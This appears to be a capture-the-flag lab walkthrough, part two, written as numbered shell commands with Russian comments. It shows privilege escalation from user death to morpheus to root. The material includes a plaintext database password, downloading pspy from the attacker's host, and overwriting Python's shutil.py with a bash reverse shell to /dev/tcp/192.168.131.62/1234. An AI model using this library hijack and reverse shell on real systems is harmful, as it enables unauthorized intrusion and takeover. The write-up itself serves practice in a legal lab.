###CVE-2020-29607 Detail### №2
##What happened next## #Просмотрел базу данных в поисках уязвимой информации или точки входа# 11. show databases;use library;show tables;select * from dreams; #Выполнил скрипт от имени пользователя death# 12. sudo -u death python3 /home/death/getDreams.py #Дал файлу права ...."все могут читать"# 14. chmod 666 /home/death/getDreams.py 15. exit 16. cat getDreams.py DB_USER = "death" DB_PASS = "!mementoMORI666!" ##ssh death@10.113.169.37## 17. cat death_flag.txt 18. ##проверил к каким файлам у нас есть доступ## find / ! -path "/proc/*" ! -path "/sys/*" ! -path "/home/death/*" -type f -writable 2>/dev/null 19. python3 -m http.server 8080 #Установил утилиту с моего хоста# 20. wget http://192.168.131.62:8080/pspy64 21. chmod 777 pspy64 22. ./pspy64 #Нашёл пользователя, который выполняет скрипт, к библиотекам которого имею доступ.# 23. #2026/07/26 17:11:01 CMD: UID=1002 PID=1531 | /bin/sh -c /usr/bin/python3.8 /home/morpheus/restore.py# 24. # Скрипт на Python использует библиотеку shutil, и, как нам известно, у нас есть права на запись в эту библиотеку. # #Python reverse shell:# 25. #echo "import os;os.system(\"bash -c 'bash -i >& /dev/tcp/192.168.131.62/1234 0>&1'\")" > /usr/lib/python3.8/shutil.py# 26. nc -lvnp 1234 27. sudo -l 28. sudo su 29. cat morpheus_flag.txt THM{DR34MS_5H4P3_TH3_W0RLD} ###I am ROOT###